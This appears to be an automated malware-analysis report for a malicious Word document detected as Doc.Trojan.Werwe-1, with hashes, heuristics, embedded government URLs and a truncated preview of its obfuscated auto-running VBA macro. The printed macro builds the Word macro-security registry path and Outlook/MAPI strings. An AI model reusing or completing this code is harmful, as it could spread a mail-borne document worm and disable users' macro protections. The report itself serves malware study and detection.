Office (OLE) malware analysis — malicious · 73e69d4ff94ce3a4

MALICIOUS

Office (OLE)

128.0 KB Created: 2000-08-17 22:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: dadb6911573505cb2ec299318e5e6d53 SHA-1: ac5a8a794f2240e2d4f045e9af1ef49b5f573f3e SHA-256: 73e69d4ff94ce3a4b24ae97aa286eea7e26228feabc64e8c3b28b4cedd2cb039

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Word document containing a VBA macro that automatically executes upon opening (Document_Open). This macro utilizes the Shell() function and CreateObject, indicating an attempt to execute external code. The ClamAV detection 'Doc.Trojan.Werwe-1' further supports its malicious nature. While the specific payload is not directly visible, the macro's functionality strongly suggests it's designed to download and execute a second-stage payload.

Heuristics 7

ClamAV: Doc.Trojan.Werwe-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Werwe-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.whitehousedrugpolicy.gov/ In document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/index.htmlIn document text (OLE body)
- http://www.state.gov/www/policy_remarks/2000/000810_pickering_colombia.htmlIn document text (OLE body)
- http://www.pub.whitehouse.gov/uri-res/I2R?urn:pdi://oma.eop.gov.us/2000/8/4/9.text.1In document text (OLE body)
- http://www.pub.whitehouse.gov/uri-res/I2R?urn:pdi://oma.eop.gov.us/2000/7/14/6.text.1In document text (OLE body)
- http://www.state.gov/www/policy_remarks/2000/000510_pickrom_colombia.htmlIn document text (OLE body)
- http://www.state.gov/www/policy_remarks/2000/000404_beers_sasc.htmlIn document text (OLE body)
- http://www.state.gov/www/policy_remarks/2000/000225_beers_sfrc.htmlIn document text (OLE body)
- http://www.state.gov/www/policy_remarks/2000/000222_pickering_latam.htmlIn document text (OLE body)
- http://www.state.gov/www/policy_remarks/2000/000215_romero_colombia.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/000111clinton_colombia.htmlIn document text (OLE body)
- http://secretary.state.gov/www/statements/2000/000111.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000816_andn_counternarc.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000804_fol-airports.htmlIn document text (OLE body)
- http://www.pub.whitehouse.gov/uri-res/I2R?urn:pdi://oma.eop.gov.us/2000/8/4/11.text.1In document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000719_plancolombia.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000714_human_rights.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000714_americans.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000710_demand.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000710_social_side.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000710_faqs.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000328_notvietnam.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000328_peace_process.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/fs_000328_plan.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/fs_000111_colombia.htmlIn document text (OLE body)
- http://secretary.state.gov/www/briefings/statements/2000/ps000816c.htmlIn document text (OLE body)
- http://secretary.state.gov/www/briefings/statements/2000/ps000809a.htmlIn document text (OLE body)
- http://www.iadb.org/exr/PRENSA/2000/cp12800e.htmIn document text (OLE body)
- http://www.state.gov/www/regions/wha/colombia/000707_madrid-dec_colombia.htmlIn document text (OLE body)
- http://www.state.gov/www/global/human_rights/1999_hrp_report/colombia.htmlIn document text (OLE body)
- http://www.state.gov/www/global/narcotics_law/1999_narc_report/samer99_part3.htmlIn document text (OLE body)
- http://www.state.gov/www/regions/wha/index.htmlIn document text (OLE body)
- http://www.state.gov/index.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 104410 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	104410 bytes
SHA-256: `6f566026237ef62da406e6a4f64f80da6cbf7b803916278ba61e67c7e7a88f53`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "x" Attribute VB_Base = "1Normal.x" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() sec$ = _ "Second" p_e = Minute(bb1) ' b_epppppppppb = Minute(bb1) dd1$ = _ "doc" ' 17.32991 n__fbbbbbbbbbn = Month(bb1) ee1$ = _ "exe" w___gnnnnnnnnw = Second(bb1) c___gwwwwwwwwwwwc = Second(bb1) y___gcccccccccy = Second(bb1) ff1$ = _ "com" ' a gg1$ = _ "sys" ' askl x____hyyyyyyyyyyyyx = Day(bb1) v____hxxxxxxxxxxv = Day(bb1) ii1$ = _ "bat" q___gvvvvvvvvvq = Second(bb1) m___gqqqqqqqqqqqqm = Second(bb1) i___gmmmmmmmmmmmmmi = Second(bb1) ' u_____iiiiiiiiiiiiu = Hour(bb1) ' ' a r_____iuuuuuuuuuuuur = Hour(bb1) ' a a_____irrrrrrrrrra = Hour(bb1) ' k__faaaaaaaak = Month(bb1) ' a ' h___gkkkkkkkkkkh = Second(bb1) u___ghhhhhhhhhhhhhu = Second(bb1) ' y___guuuuuuuuuuuy = Second(bb1) ' r____hyyyyyyyyyr = Day(bb1) a____hrrrrrrrrra = Day(bb1) m____haaaaaaaaaaam = Day(bb1) a$ = _ "" ' a ' askl h_____immmmmmmmmmmmh = Hour(bb1) cur$ = _ "_CURRENT" q___ghhhhhhhhhhhhhq = Second(bb1) j___gqqqqqqqqqqj = Second(bb1) hk1$ = _ "HKEY" + _ cur$ + "_USER" ' a i__fjjjjjjjjjji = Month(bb1) sec1$ = _ "Security" x_____iiiiiiiiiiiiix = Hour(bb1) mm1$ = _ "\" a____hxxxxxxxxxxxxxxa = Day(bb1) ' a smo$ = _ mm1$ + "Software" + mm1$ + "Microsoft" + mm1$ + "Office" x____haaaaaaaaaaaaax = Day(bb1) c____hxxxxxxxxxc = Day(bb1) ' a ' Microsoft Word cc1$ = _ Chr$(46) v_ecccccccccv = Minute(bb1) b$ = _ hk1$ + _ smo$ + mm1$ + "9" + cc1$ + "0" + mm1$ + "Word" + mm1$ + sec1$ ' 81.1579 c$ = _ "Level" b__fvvvvvvvvb = Month(bb1) d$ = _ sec1$ + cc1$ + cc1$ + cc1$ t_ebbbbbbbbt = Minute(bb1) e$ = _ "Macro" r___gttttttttttr = Second(bb1) c___grrrrrrrrrrc = Second(bb1) g$ = _ "Tools" g_____icccccccccccg = Hour(bb1) ' askl ot1$ = _ "Outlook" ' askl h$ = _ ot1$ + _ cc1$ + _ "Application" v__fggggggggv = Month(bb1) k$ = _ hk1$ + _ smo$ + _ mm1$ o___gvvvvvvvvvvvvvo = Second(bb1) ' 64.52216 nam$ = _ "x" ' a z__foooooooooooz = Month(bb1) i$ = _ nam$ + _ "?" d_____izzzzzzzzzzzzzd = Hour(bb1) h_____iddddddddddddddh = Hour(bb1) f_____ihhhhhhhhhhhhhhf = Hour(bb1) q_____ifffffffffffffq = Hour(bb1) aut$ = _ "y" ' askl j$ = _ "MAPI" ' askl l$ = _ "profile" ' a m$ = _ "password" w_eqqqqqqqw = Minute(bb1) n1$ = _ "Datos de:" ' Microsoft Word b__f ... (truncated)

SHA-256: 6f566026237ef62da406e6a4f64f80da6cbf7b803916278ba61e67c7e7a88f53

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "x"
Attribute VB_Base = "1Normal.x"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
            sec$ = _
         "Second"
                p_e = Minute(bb1)
     '
  b_epppppppppb = Minute(bb1)
          dd1$ = _
             "doc"
  '  17.32991
              n__fbbbbbbbbbn = Month(bb1)
                      ee1$ = _
      "exe"
                       w___gnnnnnnnnw = Second(bb1)
   c___gwwwwwwwwwwwc = Second(bb1)
                         y___gcccccccccy = Second(bb1)
       ff1$ = _
          "com"
           ' a
               gg1$ = _
             "sys"
           ' askl
                        x____hyyyyyyyyyyyyx = Day(bb1)
                      v____hxxxxxxxxxxv = Day(bb1)
      ii1$ = _
    "bat"
                 q___gvvvvvvvvvq = Second(bb1)
             m___gqqqqqqqqqqqqm = Second(bb1)
         i___gmmmmmmmmmmmmmi = Second(bb1)
            '
                     u_____iiiiiiiiiiiiu = Hour(bb1)
   '
           ' a
                  r_____iuuuuuuuuuuuur = Hour(bb1)
           ' a
 a_____irrrrrrrrrra = Hour(bb1)
   '
           k__faaaaaaaak = Month(bb1)
           ' a
           '
        h___gkkkkkkkkkkh = Second(bb1)
                     u___ghhhhhhhhhhhhhu = Second(bb1)
          '
                         y___guuuuuuuuuuuy = Second(bb1)
            '
                  r____hyyyyyyyyyr = Day(bb1)
 a____hrrrrrrrrra = Day(bb1)
             m____haaaaaaaaaaam = Day(bb1)
   a$ = _
           ""
           ' a
           ' askl
        h_____immmmmmmmmmmmh = Hour(bb1)
      cur$ = _
             "_CURRENT"
                 q___ghhhhhhhhhhhhhq = Second(bb1)
          j___gqqqqqqqqqqj = Second(bb1)
            hk1$ = _
                     "HKEY" + _
           cur$ + "_USER"
           ' a
         i__fjjjjjjjjjji = Month(bb1)
                 sec1$ = _
          "Security"
                        x_____iiiiiiiiiiiiix = Hour(bb1)
            mm1$ = _
           "\"
 a____hxxxxxxxxxxxxxxa = Day(bb1)
           ' a
      smo$ = _
  mm1$ + "Software" + mm1$ + "Microsoft" + mm1$ + "Office"
                        x____haaaaaaaaaaaaax = Day(bb1)
   c____hxxxxxxxxxc = Day(bb1)
           ' a
           ' Microsoft Word
                         cc1$ = _
         Chr$(46)
                      v_ecccccccccv = Minute(bb1)
                  b$ = _
      hk1$ + _
  smo$ + mm1$ + "9" + cc1$ + "0" + mm1$ + "Word" + mm1$ + sec1$
                      '  81.1579
  c$ = _
     "Level"
  b__fvvvvvvvvb = Month(bb1)
                d$ = _
            sec1$ + cc1$ + cc1$ + cc1$
                    t_ebbbbbbbbt = Minute(bb1)
                   e$ = _
       "Macro"
                  r___gttttttttttr = Second(bb1)
   c___grrrrrrrrrrc = Second(bb1)
     g$ = _
          "Tools"
       g_____icccccccccccg = Hour(bb1)
           ' askl
              ot1$ = _
      "Outlook"
           ' askl
                           h$ = _
  ot1$ + _
      cc1$ + _
             "Application"
                      v__fggggggggv = Month(bb1)
            k$ = _
                       hk1$ + _
          smo$ + _
         mm1$
               o___gvvvvvvvvvvvvvo = Second(bb1)
                      '  64.52216
                      nam$ = _
    "x"
           ' a
                          z__foooooooooooz = Month(bb1)
              i$ = _
        nam$ + _
     "?"
    d_____izzzzzzzzzzzzzd = Hour(bb1)
        h_____iddddddddddddddh = Hour(bb1)
      f_____ihhhhhhhhhhhhhhf = Hour(bb1)
                 q_____ifffffffffffffq = Hour(bb1)
               aut$ = _
      "y"
           ' askl
                j$ = _
   "MAPI"
           ' askl
                           l$ = _
      "profile"
           ' a
                 m$ = _
            "password"
                       w_eqqqqqqqw = Minute(bb1)
                 n1$ = _
   "Datos de:"
           ' Microsoft Word
  b__f
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.